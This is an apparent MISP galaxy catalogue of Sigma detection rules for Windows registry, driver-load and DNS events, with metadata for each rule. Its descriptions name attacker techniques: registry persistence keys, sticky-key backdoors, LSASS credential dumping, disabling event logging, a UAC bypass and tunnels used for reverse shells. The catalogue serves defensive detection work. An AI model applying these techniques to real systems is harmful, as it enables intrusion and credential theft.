Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup

Internal MISP references

UUID c74d7efc-8826-45d9-b8bb-f04fac9e4eff which can be used as unique global reference for Run Once Task Configuration in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Avneet Singh @v3t0_, oscd.community
creation_date 2020-11-15
falsepositive ['Legitimate modification of the registry key by legitimate program']
filename registry_event_runonce_persistence.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Narrator's Feedback-Hub Persistence

Detects abusing Windows 10 Narrator's Feedback-Hub

Internal MISP references

UUID f663a6d9-9d1b-49b8-b2b1-0637914d199a which can be used as unique global reference for Narrator's Feedback-Hub Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dmitriy Lifanov, oscd.community
creation_date 2019-10-25
falsepositive ['Unknown']
filename registry_event_narrator_feedback_persistance.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Creation of a Local Hidden User Account by Registry

Sysmon registry detection of a local hidden user account.

Internal MISP references

UUID 460479f3-80b7-42da-9c43-2cc1d54dbccd which can be used as unique global reference for Creation of a Local Hidden User Account by Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-05-03
falsepositive ['Unknown']
filename registry_event_add_local_hidden_user.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Via Wsreset

Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.

Internal MISP references

UUID 6ea3bf32-9680-422d-9f50-e90716b12a66 which can be used as unique global reference for UAC Bypass Via Wsreset in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Dmitry Uchakin
creation_date 2020-10-07
falsepositive ['Unknown']
filename registry_event_bypass_via_wsreset.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

New DLL Added to AppInit_DLLs Registry Key

DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll

Internal MISP references

UUID 4f84b697-c9ed-4420-8ab5-e09af5b2345d which can be used as unique global reference for New DLL Added to AppInit_DLLs Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community, Tim Shelton
creation_date 2019-10-25
falsepositive ['Unknown']
filename registry_event_new_dll_added_to_appinit_dlls_registry_key.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.010']
Related clusters

To see the related clusters, click here.

Esentutl Volume Shadow Copy Service Keys

Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.

Internal MISP references

UUID 5aad0995-46ab-41bd-a9ff-724f41114971 which can be used as unique global reference for Esentutl Volume Shadow Copy Service Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020-10-20
falsepositive ['Unknown']
filename registry_event_esentutl_volume_shadow_copy_service_keys.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Registry Entries For Azorult Malware

Detects the presence of a registry key created during Azorult execution

Internal MISP references

UUID f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7 which can be used as unique global reference for Registry Entries For Azorult Malware in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick
creation_date 2020-05-08
falsepositive ['Unknown']
filename registry_event_mal_azorult.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.execution', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Qakbot Registry Activity

Detects a registry key used by IceID in a campaign that distributes malicious OneNote files

Internal MISP references

UUID 1c8e96cd-2bed-487d-9de0-b46c90cade56 which can be used as unique global reference for Potential Qakbot Registry Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hieu Tran
creation_date 2023-03-13
falsepositive ['Unknown']
filename registry_event_malware_qakbot_registry.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Windows Credential Editor Registry

Detects the use of Windows Credential Editor (WCE)

Internal MISP references

UUID a6b33c02-8305-488f-8585-03cb2a7763f2 which can be used as unique global reference for Windows Credential Editor Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-12-31
falsepositive ['Unknown']
filename registry_event_hack_wce_reg.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001', 'attack.s0005']
Related clusters

To see the related clusters, click here.

Path To Screensaver Binary Modified

Detects value modification of registry key containing path to binary used as screensaver.

Internal MISP references

UUID 67a6c006-3fbe-46a7-9074-2ba3b82c3000 which can be used as unique global reference for Path To Screensaver Binary Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz @bczyz1, oscd.community
creation_date 2020-10-11
falsepositive ['Legitimate modification of screensaver']
filename registry_event_modify_screensaver_binary_path.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1546.002']
Related clusters

To see the related clusters, click here.

Disable Security Events Logging Adding Reg Key MiniNt

Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stop writing events.

Internal MISP references

UUID 919f2ef0-be2d-4a7a-b635-eb2b41fde044 which can be used as unique global reference for Disable Security Events Logging Adding Reg Key MiniNt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019-10-25
falsepositive ['Unknown']
filename registry_event_disable_security_events_logging_adding_reg_key_minint.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1562.002', 'attack.t1112', 'car.2022-03-001']
Related clusters

To see the related clusters, click here.

Office Application Startup - Office Test

Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started

Internal MISP references

UUID 3d27f6dd-1c74-4687-b4fa-ca849d128d1c which can be used as unique global reference for Office Application Startup - Office Test in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020-10-25
falsepositive ['Unlikely']
filename registry_event_office_test_regadd.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137.002']
Related clusters

To see the related clusters, click here.

Suspicious Run Key from Download

Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories

Internal MISP references

UUID 9c5037d1-c568-49b3-88c7-9846a5bdc2be which can be used as unique global reference for Suspicious Run Key from Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems)
creation_date 2019-10-01
falsepositive ['Software installers downloaded and used by users']
filename registry_event_susp_download_run_key.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

HybridConnectionManager Service Installation - Registry

Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.

Internal MISP references

UUID ac8866c7-ce44-46fd-8c17-b24acff96ca8 which can be used as unique global reference for HybridConnectionManager Service Installation - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021-04-12
falsepositive ['Unknown']
filename registry_event_hybridconnectionmgr_svc_installation.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.resource-development', 'attack.t1608']
Related clusters

To see the related clusters, click here.

Security Support Provider (SSP) Added to LSA Configuration

Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.

Internal MISP references

UUID eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc which can be used as unique global reference for Security Support Provider (SSP) Added to LSA Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author iwillkeepwatch
creation_date 2019-01-18
falsepositive ['Unknown']
filename registry_event_ssp_added_lsa_config.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.005']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Via LSASS SilentProcessExit Technique

Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process

Internal MISP references

UUID 55e29995-75e7-451a-bef0-6225e2f13597 which can be used as unique global reference for Potential Credential Dumping Via LSASS SilentProcessExit Technique in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-02-26
falsepositive ['Unlikely']
filename registry_event_silentprocessexit_lsass.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Camera and Microphone Access

Detects Processes accessing the camera and microphone from suspicious folder

Internal MISP references

UUID 62120148-6b7a-42be-8b91-271c04e281a3 which can be used as unique global reference for Suspicious Camera and Microphone Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Den Iuzvyk
creation_date 2020-06-07
falsepositive ['Unlikely, there could be conferencing software running from a Temp folder accessing the devices']
filename registry_event_susp_mic_cam_access.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.collection', 'attack.t1125', 'attack.t1123']
Related clusters

To see the related clusters, click here.

Wdigest CredGuard Registry Modification

Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.

Internal MISP references

UUID 1a2d6c47-75b0-45bd-b133-2c0be75349fd which can be used as unique global reference for Wdigest CredGuard Registry Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019-08-25
falsepositive ['Unknown']
filename registry_event_disable_wdigest_credential_guard.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

RedMimicry Winnti Playbook Registry Manipulation

Detects actions caused by the RedMimicry Winnti playbook

Internal MISP references

UUID 5b175490-b652-4b02-b1de-5b5b4083c5f8 which can be used as unique global reference for RedMimicry Winnti Playbook Registry Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander Rausch
creation_date 2020-06-24
falsepositive ['Unknown']
filename registry_event_redmimicry_winnti_reg.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback

Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.

Internal MISP references

UUID 4d431012-2ab5-4db7-a84e-b29809da2172 which can be used as unique global reference for Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023-11-03
falsepositive ['Administrative activity']
filename registry_set_enable_anonymous_connection.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Sticky Key Like Backdoor Usage - Registry

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

Internal MISP references

UUID baca5663-583c-45f9-b5dc-ea96a22ce542 which can be used as unique global reference for Sticky Key Like Backdoor Usage - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
creation_date 2018-03-15
falsepositive ['Unlikely']
filename registry_event_stickykey_like_backdoor.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.008', 'car.2014-11-003', 'car.2014-11-008']
Related clusters

To see the related clusters, click here.

DLL Load via LSASS

Detects a method to load DLL via LSASS process using an undocumented Registry key

Internal MISP references

UUID b3503044-60ce-4bf4-bbcb-e3db98788823 which can be used as unique global reference for DLL Load via LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-10-16
falsepositive ['Unknown']
filename registry_event_susp_lsass_dll_load.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1547.008']
Related clusters

To see the related clusters, click here.

NetNTLM Downgrade Attack - Registry

Detects NetNTLM downgrade attack

Internal MISP references

UUID d67572a0-e2ec-45d6-b8db-c100d14b8ef2 which can be used as unique global reference for NetNTLM Downgrade Attack - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT)
creation_date 2018-03-20
falsepositive ['Services or tools that set the values to more restrictive values']
filename registry_event_net_ntlm_downgrade.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1562.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

WINEKEY Registry Modification

Detects potential malicious modification of run keys by winekey or team9 backdoor

Internal MISP references

UUID b98968aa-dbc0-4a9c-ac35-108363cbf8d5 which can be used as unique global reference for WINEKEY Registry Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020-10-30
falsepositive ['Unknown']
filename registry_event_runkey_winekey.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

CMSTP Execution Registry Event

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Internal MISP references

UUID b6d235fc-1d38-4b12-adbe-325f06728f37 which can be used as unique global reference for CMSTP Execution Registry Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman
creation_date 2018-07-16
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename registry_event_cmstp_execution_by_registry.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

PUA - Sysinternals Tools Execution - Registry

Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.

Internal MISP references

UUID c7da8edc-49ae-45a2-9e61-9fd860e4e73d which can be used as unique global reference for PUA - Sysinternals Tools Execution - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-24
falsepositive ['Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment']
filename registry_add_pua_sysinternals_susp_execution_via_eula.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.resource-development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Suspicious Execution Of Renamed Sysinternals Tools - Registry

Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)

Internal MISP references

UUID f50f3c09-557d-492d-81db-9064a8d4e211 which can be used as unique global reference for Suspicious Execution Of Renamed Sysinternals Tools - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-24
falsepositive ['Unlikely']
filename registry_add_pua_sysinternals_renamed_execution_via_eula.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.resource-development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Potential COM Object Hijacking Via TreatAs Subkey - Registry

Detects COM object hijacking via TreatAs subkey

Internal MISP references

UUID 9b0f8a61-91b2-464f-aceb-0527e0a45020 which can be used as unique global reference for Potential COM Object Hijacking Via TreatAs Subkey - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kutepov Anton, oscd.community
creation_date 2019-10-23
falsepositive ['Maybe some system utilities in rare cases use linking keys for backward compatibility']
filename registry_add_persistence_com_key_linking.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

PUA - Sysinternal Tool Execution - Registry

Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key

Internal MISP references

UUID 25ffa65d-76d8-4da5-a832-3f2b0136e133 which can be used as unique global reference for PUA - Sysinternal Tool Execution - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2017-08-28
falsepositive ['Legitimate use of SysInternals tools', 'Programs that use the same Registry Key']
filename registry_add_pua_sysinternals_execution_via_eula.yml
level low
logsource.category registry_add
logsource.product windows
tags ['attack.resource-development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Potential Persistence Via New AMSI Providers - Registry

Detects when an attacker registers a new AMSI provider in order to achieve persistence

Internal MISP references

UUID 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 which can be used as unique global reference for Potential Persistence Via New AMSI Providers - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Legitimate security products adding their own AMSI providers. Filter these according to your environment']
filename registry_add_persistence_amsi_providers.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.persistence']

Potential Persistence Via Disk Cleanup Handler - Registry

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

Internal MISP references

UUID d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a which can be used as unique global reference for Potential Persistence Via Disk Cleanup Handler - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Legitimate new entry added by windows']
filename registry_add_persistence_disk_cleanup_handler_entry.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.persistence']

Potential Persistence Via Logon Scripts - Registry

Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors

Internal MISP references

UUID 9ace0707-b560-49b8-b6ca-5148b42f39fb which can be used as unique global reference for Potential Persistence Via Logon Scripts - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure)
creation_date 2019-01-12
falsepositive ['Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate']
filename registry_add_persistence_logon_scripts_userinitmprlogonscript.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.privilege-escalation', 'attack.t1037.001', 'attack.persistence', 'attack.lateral-movement']
Related clusters

To see the related clusters, click here.

Vulnerable WinRing0 Driver Load

Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation

Internal MISP references

UUID 1a42dfa6-6cb2-4df9-9b48-295be477e835 which can be used as unique global reference for Vulnerable WinRing0 Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-07-26
falsepositive ['Unknown']
filename driver_load_win_vuln_winring0_driver.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Driver Load From A Temporary Directory

Detects a driver load from a temporary directory

Internal MISP references

UUID 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75 which can be used as unique global reference for Driver Load From A Temporary Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017-02-12
falsepositive ['There is a relevant set of false positives depending on applications in the environment']
filename driver_load_win_susp_temp_use.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

PUA - Process Hacker Driver Load

Detects driver load of the Process Hacker tool

Internal MISP references

UUID 67add051-9ee7-4ad3-93ba-42935615ae8d which can be used as unique global reference for PUA - Process Hacker Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-11-16
falsepositive ['Legitimate use of process hacker or system informer by developers or system administrators']
filename driver_load_win_pua_process_hacker.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'cve.2021-21551', 'attack.t1543']
Related clusters

To see the related clusters, click here.

PUA - System Informer Driver Load

Detects driver load of the System Informer tool

Internal MISP references

UUID 10cb6535-b31d-4512-9962-513dcbc42cc1 which can be used as unique global reference for PUA - System Informer Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023-05-08
falsepositive ['System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly']
filename driver_load_win_pua_system_informer.yml
level medium
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Malicious Driver Load By Name

Detects loading of known malicious drivers via the file name of the drivers.

Internal MISP references

UUID 39b64854-5497-4b57-a448-40977b8c9679 which can be used as unique global reference for Malicious Driver Load By Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-03
falsepositive ["False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", 'If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)']
filename driver_load_win_mal_drivers_names.yml
level medium
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Vulnerable Driver Load

Detects loading of known vulnerable drivers via their hash.

Internal MISP references

UUID 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8 which can be used as unique global reference for Vulnerable Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-18
falsepositive ['Unknown']
filename driver_load_win_vuln_drivers.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Vulnerable Driver Load By Name

Detects the load of known vulnerable drivers via the file name of the drivers.

Internal MISP references

UUID 72cd00d6-490c-4650-86ff-1d11f491daa1 which can be used as unique global reference for Vulnerable Driver Load By Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-03
falsepositive ["False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", 'If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)']
filename driver_load_win_vuln_drivers_names.yml
level low
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Malicious Driver Load

Detects loading of known malicious drivers via their hash.

Internal MISP references

UUID 05296024-fe8a-4baf-8f3d-9a5f5624ceb2 which can be used as unique global reference for Malicious Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-18
falsepositive ['Unknown']
filename driver_load_win_mal_drivers.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Vulnerable HackSys Extreme Vulnerable Driver Load

Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors

Internal MISP references

UUID 295c9289-acee-4503-a571-8eacaef36b28 which can be used as unique global reference for Vulnerable HackSys Extreme Vulnerable Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-18
falsepositive ['Unlikely']
filename driver_load_win_vuln_hevd_driver.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

WinDivert Driver Load

Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows

Internal MISP references

UUID 679085d5-f427-4484-9f58-1dc30a7c426d which can be used as unique global reference for WinDivert Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-07-30
falsepositive ['Legitimate WinDivert driver usage']
filename driver_load_win_windivert.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.credential-access', 'attack.collection', 'attack.defense-evasion', 'attack.t1599.001', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

Suspicious Cobalt Strike DNS Beaconing - Sysmon

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

Internal MISP references

UUID f356a9c4-effd-4608-bbf8-408afd5cd006 which can be used as unique global reference for Suspicious Cobalt Strike DNS Beaconing - Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-11-09
falsepositive ['Unknown']
filename dns_query_win_mal_cobaltstrike.yml
level critical
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

Detects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID a1d9eec5-33b2-4177-8d24-27fe754d0812 which can be used as unique global reference for Cloudflared Tunnels Related DNS Requests in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-12-20
falsepositive ['Legitimate use of cloudflare tunnels will also trigger this.']
filename dns_query_win_cloudflared_communication.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.t1071.001', 'attack.t1572']
Related clusters

To see the related clusters, click here.

DNS Query To Common Malware Hosting and Shortener Services

Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners. These include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc. Such DNS activity can indicate potential delivery or command-and-control communication attempts.

Internal MISP references

UUID f8c1e80b-c73a-476a-ae24-6c72528b1521 which can be used as unique global reference for DNS Query To Common Malware Hosting and Shortener Services in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ahmed Nosir (@egycondor)
creation_date 2025-06-02
falsepositive ['Legitimate use of these services is possible but rare in enterprise environments']
filename dns_query_win_common_malware_hosting_services.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

DNS Query To AzureWebsites.NET By Non-Browser Process

Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.

Internal MISP references

UUID e043f529-8514-4205-8ab0-7f7d2927b400 which can be used as unique global reference for DNS Query To AzureWebsites.NET By Non-Browser Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-06-24
falsepositive ['Likely with other browser software. Apply additional filters for any other browsers you might use.']
filename dns_query_win_domain_azurewebsites.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

AppX Package Installation Attempts Via AppInstaller.EXE

Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL

Internal MISP references

UUID 7cff77e1-9663-46a3-8260-17f2e1aa9d0a which can be used as unique global reference for AppX Package Installation Attempts Via AppInstaller.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-11-24
falsepositive ['Unknown']
filename dns_query_win_appinstaller.yml
level medium
logsource.category dns_query
logsource.product windows
